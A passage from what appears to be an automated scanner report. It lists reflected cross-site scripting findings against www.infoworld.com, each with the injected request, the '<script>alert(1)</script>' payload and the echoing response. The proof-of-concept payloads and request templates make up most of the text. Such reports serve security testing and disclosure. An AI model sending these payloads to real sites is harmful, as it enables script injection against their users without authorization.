Date: Mon, 19 Sep 2011 19:33:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:45 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460825-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes/ifw/images/bg_IW_logo.png41385"><script>alert(1)</script>6200c116d34&123">
...[SNIP]...

1.68. http://www.infoworld.com/sites/all/themes/ifw/images/icons/small_right_arrow_white.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/icons/small_right_arrow_white.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d67fb"><script>alert(1)</script>b9bc54c8673 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesd67fb"><script>alert(1)</script>b9bc54c8673/all/themes/ifw/images/icons/small_right_arrow_white.gif?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:36 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460816-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sitesd67fb"><script>alert(1)</script>b9bc54c8673/all/themes/ifw/images/icons/small_right_arrow_white.gif&123">
...[SNIP]...

1.69. http://www.infoworld.com/sites/all/themes/ifw/images/icons/small_right_arrow_white.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/icons/small_right_arrow_white.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89a8b"><script>alert(1)</script>fc479d61844 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all89a8b"><script>alert(1)</script>fc479d61844/themes/ifw/images/icons/small_right_arrow_white.gif?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:39 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460819-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all89a8b"><script>alert(1)</script>fc479d61844/themes/ifw/images/icons/small_right_arrow_white.gif&123">
...[SNIP]...

1.70. http://www.infoworld.com/sites/all/themes/ifw/images/icons/small_right_arrow_white.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/icons/small_right_arrow_white.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a034"><script>alert(1)</script>24926177d39 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes7a034"><script>alert(1)</script>24926177d39/ifw/images/icons/small_right_arrow_white.gif?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:41 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460821-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes7a034"><script>alert(1)</script>24926177d39/ifw/images/icons/small_right_arrow_white.gif&123">
...[SNIP]...

1.71. http://www.infoworld.com/sites/all/themes/ifw/images/icons/small_right_arrow_white.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/icons/small_right_arrow_white.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3db7"><script>alert(1)</script>b5116fad91f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/ifwa3db7"><script>alert(1)</script>b5116fad91f/images/icons/small_right_arrow_white.gif?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:43 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460823-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes/ifwa3db7"><script>alert(1)</script>b5116fad91f/images/icons/small_right_arrow_white.gif&123">
...[SNIP]...

1.72. http://www.infoworld.com/sites/all/themes/ifw/images/icons/small_right_arrow_white.gif [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/icons/small_right_arrow_white.gif

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d0a2"><script>alert(1)</script>b60de576baf was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/ifw/images2d0a2"><script>alert(1)</script>b60de576baf/icons/small_right_arrow_white.gif?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:46 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460826-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes/ifw/images2d0a2"><script>alert(1)</script>b60de576baf/icons/small_right_arrow_white.gif&123">
...[SNIP]...

1.73. http://www.infoworld.com/sites/all/themes/ifw/images/icons/small_right_arrow_white.gif [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/icons/small_right_arrow_white.gif

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf26a"><script>alert(1)</script>cc33fa980f0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/ifw/images/iconsbf26a"><script>alert(1)</script>cc33fa980f0/small_right_arrow_white.gif?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:48 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460828-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes/ifw/images/iconsbf26a"><script>alert(1)</script>cc33fa980f0/small_right_arrow_white.gif&123">
...[SNIP]...

1.74. http://www.infoworld.com/sites/all/themes/ifw/images/icons/small_right_arrow_white.gif [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/icons/small_right_arrow_white.gif

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac05d"><script>alert(1)</script>e21cf643b12 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/ifw/images/icons/small_right_arrow_white.gifac05d"><script>alert(1)</script>e21cf643b12?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:51 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460831-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes/ifw/images/icons/small_right_arrow_white.gifac05d"><script>alert(1)</script>e21cf643b12&123">
...[SNIP]...

1.75. http://www.infoworld.com/sites/all/themes/ifw/images/utilitybar_bg.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/utilitybar_bg.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97b36"><script>alert(1)</script>231bfbd7d2e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites97b36"><script>alert(1)</script>231bfbd7d2e/all/themes/ifw/images/utilitybar_bg.png?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:34 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460814-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites97b36"><script>alert(1)</script>231bfbd7d2e/all/themes/ifw/images/utilitybar_bg.png&123">
...[SNIP]...

1.76. http://www.infoworld.com/sites/all/themes/ifw/images/utilitybar_bg.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/utilitybar_bg.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c29f7"><script>alert(1)</script>b94c69befaf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/allc29f7"><script>alert(1)</script>b94c69befaf/themes/ifw/images/utilitybar_bg.png?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:36 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460816-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/allc29f7"><script>alert(1)</script>b94c69befaf/themes/ifw/images/utilitybar_bg.png&123">
...[SNIP]...

1.77. http://www.infoworld.com/sites/all/themes/ifw/images/utilitybar_bg.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/utilitybar_bg.png

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34533"><script>alert(1)</script>81d3847c37b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes34533"><script>alert(1)</script>81d3847c37b/ifw/images/utilitybar_bg.png?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:38 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460818-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes34533"><script>alert(1)</script>81d3847c37b/ifw/images/utilitybar_bg.png&123">
...[SNIP]...

1.78. http://www.infoworld.com/sites/all/themes/ifw/images/utilitybar_bg.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/utilitybar_bg.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a180"><script>alert(1)</script>7209ca4eb54 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/ifw4a180"><script>alert(1)</script>7209ca4eb54/images/utilitybar_bg.png?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:41 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460821-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes/ifw4a180"><script>alert(1)</script>7209ca4eb54/images/utilitybar_bg.png&123">
...[SNIP]...

1.79. http://www.infoworld.com/sites/all/themes/ifw/images/utilitybar_bg.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/utilitybar_bg.png

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b41d6"><script>alert(1)</script>52e4d634c9d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/ifw/imagesb41d6"><script>alert(1)</script>52e4d634c9d/utilitybar_bg.png?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:43 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460823-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes/ifw/imagesb41d6"><script>alert(1)</script>52e4d634c9d/utilitybar_bg.png&123">
...[SNIP]...

1.80. http://www.infoworld.com/sites/all/themes/ifw/images/utilitybar_bg.png [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/utilitybar_bg.png

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b71c"><script>alert(1)</script>89dd0153c7e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/ifw/images/utilitybar_bg.png9b71c"><script>alert(1)</script>89dd0153c7e?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:45 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460825-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes/ifw/images/utilitybar_bg.png9b71c"><script>alert(1)</script>89dd0153c7e&123">
...[SNIP]...

1.81. http://www.infoworld.com/sites/all/themes/ifw/scripts/leadgen_tracking.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/scripts/leadgen_tracking.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3b7c"><script>alert(1)</script>9093b01b81e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesb3b7c"><script>alert(1)</script>9093b01b81e/all/themes/ifw/scripts/leadgen_tracking.js?6 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
